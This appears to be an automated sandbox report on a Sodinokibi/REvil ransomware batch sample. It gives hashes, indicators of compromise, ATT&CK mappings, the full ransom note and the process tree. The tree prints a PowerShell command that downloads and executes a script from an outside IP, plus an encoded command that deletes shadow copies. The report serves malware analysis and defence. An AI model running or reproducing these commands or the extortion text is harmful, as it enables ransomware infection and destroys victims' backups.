sodinokibi | 9f5a1dc3b6de60187465045347cd822a1442279e6d75aa5b8e08bfe8811619c4

General

Target

671ad8514649a9e90db4be04050939fc.bat
Size

222B
MD5

ae3b86ee141489a333cd5b79879ce5fb
SHA1

59fcd2d5b1dc48ea3a135a908d2342f41801c748
SHA256

9f5a1dc3b6de60187465045347cd822a1442279e6d75aa5b8e08bfe8811619c4
SHA512

08e7101feb1b8fcc3e48a3b6586279038d039490a198bbfa3c71acfb6c020b917a5941517376d1f7518f8e28b810f871c0401ad2aa0dc5ff86c522a18973d6c7

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc

Extracted

Path

C:\t59qq1s-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension t59qq1s. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FA804DD0DEFEFFDE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FA804DD0DEFEFFDE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: zCMKZCfeb4mPiK0c34h6H+ZhDmzfen1TwUWgE4byUM3gu/UewrWGjEeLY6YErB37 PolT2llj6XcM/hX666aT0PSLau2gL2XfHA38r6+Umlh8rYY7QxxZBtU1I5bdpYyF Zq5/73cb5uRsNJxlb9N59CIPawnPKJlCPMFjGlNzgQg0Ia1rvyr8BwiaYCl6wb2S Ml3VM0PgZnINuwP4OprEqf0fVSJ2gLMV0Ls2P4t7zyXLocObZqKXxLpcnXZsBi92 2RAsbaxiT+NRq5ezkNKsKo5AOGy7nv+3PCnJIbC6FXHWqfXd3ImI7/TVGS+k+/bt BhLD8SRZJ2jgJkji8b9oum6LQpuxOnmvZNZzuELQ1GDXFRa9igGZ8MEStUNRqTOq 5K1ghigVlLeDXI8niDhdwtuP6Odnqw8uE8JRQldpGRrcObV7hK1ZEmUrm/91KQa2 QkCUJB//dMAatsD5yt5UHhuwWeZJI/2sIVdFJ+5yjGFMuXWy8NgiG0S1HwVXqhf/ nldJzMQqN1ShaK8JcbOUCr1OLLpCoOGJS8jtrKfPNY6x7pHc2/rVR1a0sXFvp5Gs KiYwMTOu1SOq9fwxr8P2zKNcg8z1W9ywLt0QdjD4ZHMpdyzIsvZ2A/Fk96v4WZvj kvqKBfwh/FfVUSg6Fw05Q3YknaA9imnVrHcpq560CIYZzLAVdxma1MKXe8HVSXO2 CT5yC2jqNZK1lE1VjUqohBvzGsITXSMSJlQ/twc6dr/BKyLq3KUsJTE/c4EMekxB JOBIiakN2KbHB+h2WLqPHVSgnyfbJMBkBqIgath9ZNY1DSs1+3TwlOSGQqhJAyuR blyeyMAS9SepR5+7WP1HpU95wQldWaDNgIu+bZEvnZwKX0IIRJxeXosbWzEMdkC5 6O7YcBvoXCBDxA1DBfVlJ7reBF0NL45mDCPLLGKh8TDxPx3wO6+WBSjg/8nRgsvN 5VqyHjDbd8Owe5QSKKamVYYNaIyihaZOQZFJT7P1xGIKKWTzufWPsAG8g/8q9bok WY3ZMGwUBbZVf4Hmk5t/t1hUZr1B4XBYu363CIigPm+IPsSJUw24hYqQlYE+kWbm Gt/Fajs9+nVL3wLCCynNZw0IAGNiQWCn9B0hFn1z+HGYmNxjQ+by06fEVmfNYbZ/ RxMmz4IfDTJtVcfKkC+wPx+UU2xmOcSlppo4nq1DhEZ/69RpYTuOyXkU6LaZdI5w ztZJ1vWeV/BCwZfyZHuZF5hWxv+jG8hPr8AqXiXX9mSli+MNwoDKrp2GPaeO/sMG twcsHHhCmAUEvOch7n4gcC1zazOgP5oHokM/XklFijwLig== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FA804DD0DEFEFFDE

http://decryptor.cc/FA804DD0DEFEFFDE

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 932 powershell.exe

flow	pid	process
4	932	powershell.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\UnprotectRedo.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConnectCheckpoint.crw => \??\c:\users\admin\pictures\ConnectCheckpoint.crw.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\LockRemove.raw => \??\c:\users\admin\pictures\LockRemove.raw.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\SubmitCompare.crw => \??\c:\users\admin\pictures\SubmitCompare.crw.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnprotectRedo.tiff => \??\c:\users\admin\pictures\UnprotectRedo.tiff.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\WriteRegister.png => \??\c:\users\admin\pictures\WriteRegister.png.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\DismountCheckpoint.crw => \??\c:\users\admin\pictures\DismountCheckpoint.crw.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\LimitUnprotect.tif => \??\c:\users\admin\pictures\LimitUnprotect.tif.t59qq1s	powershell.exe
File renamed	C:\Users\Admin\Pictures\ReceiveResize.crw => \??\c:\users\admin\pictures\ReceiveResize.crw.t59qq1s	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2l37v7e2.bmp"	powershell.exe

Drops file in Program Files directory 27 IoCs

Processes:

powershell.exe

description	ioc	process
File created	\??\c:\program files\t59qq1s-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\RenameResolve.odt	powershell.exe
File created	\??\c:\program files (x86)\t59qq1s-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\JoinSync.ex_	powershell.exe
File opened for modification	\??\c:\program files\ResetMount.tmp	powershell.exe
File opened for modification	\??\c:\program files\TraceRestart.mpeg3	powershell.exe
File opened for modification	\??\c:\program files\StepMerge.xml	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\t59qq1s-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompareExpand.pdf	powershell.exe
File opened for modification	\??\c:\program files\CompressCompare.odp	powershell.exe
File opened for modification	\??\c:\program files\InstallFind.wvx	powershell.exe
File opened for modification	\??\c:\program files\JoinSplit.vb	powershell.exe
File opened for modification	\??\c:\program files\RenameWrite.rtf	powershell.exe
File opened for modification	\??\c:\program files\AddConvertTo.cfg	powershell.exe
File opened for modification	\??\c:\program files\SetInvoke.ini	powershell.exe
File opened for modification	\??\c:\program files\UseOpen.jpeg	powershell.exe
File opened for modification	\??\c:\program files\ExpandFormat.css	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\t59qq1s-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\PublishPop.mp4	powershell.exe
File opened for modification	\??\c:\program files\UnregisterSync.easmx	powershell.exe
File opened for modification	\??\c:\program files\CompleteRedo.snd	powershell.exe
File opened for modification	\??\c:\program files\ImportRename.midi	powershell.exe
File opened for modification	\??\c:\program files\UnregisterPush.pps	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\t59qq1s-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\EnterPush.png	powershell.exe
File opened for modification	\??\c:\program files\LimitSync.xhtml	powershell.exe
File opened for modification	\??\c:\program files\OpenOut.htm	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

932 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

932 powershell.exe
932 powershell.exe
932 powershell.exe
1848 powershell.exe
1848 powershell.exe

pid	process
932	powershell.exe

pid	process
932	powershell.exe
932	powershell.exe
932	powershell.exe
1848	powershell.exe
1848	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeBackupPrivilege	1640	vssvc.exe
Token: SeRestorePrivilege	1640	vssvc.exe
Token: SeAuditPrivilege	1640	vssvc.exe
Token: SeTakeOwnershipPrivilege	932	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1448 wrote to memory of 932	1448	cmd.exe	powershell.exe
PID 1448 wrote to memory of 932	1448	cmd.exe	powershell.exe
PID 1448 wrote to memory of 932	1448	cmd.exe	powershell.exe
PID 1448 wrote to memory of 932	1448	cmd.exe	powershell.exe
PID 932 wrote to memory of 1848	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 1848	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 1848	932	powershell.exe	powershell.exe
PID 932 wrote to memory of 1848	932	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\671ad8514649a9e90db4be04050939fc.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc');Invoke-BLPXTQOPGQRVCUQ;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/932-5-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/932-21-0x00000000061B0000-0x00000000061B1000-memory.dmp

Filesize
4KB

Download
memory/932-22-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/932-14-0x00000000061E0000-0x00000000061E1000-memory.dmp

Filesize
4KB

Download
memory/932-13-0x00000000056B0000-0x00000000056B1000-memory.dmp

Filesize
4KB

Download
memory/932-8-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/932-0-0x0000000000000000-mapping.dmp

Download
memory/932-4-0x0000000004710000-0x0000000004711000-memory.dmp

Filesize
4KB

Download
memory/932-3-0x00000000048B0000-0x00000000048B1000-memory.dmp

Filesize
4KB

Download
memory/932-2-0x0000000002360000-0x0000000002361000-memory.dmp

Filesize
4KB

Download
memory/932-1-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download
memory/1848-23-0x0000000000000000-mapping.dmp

Download
memory/1848-25-0x0000000073FF0000-0x00000000746DE000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads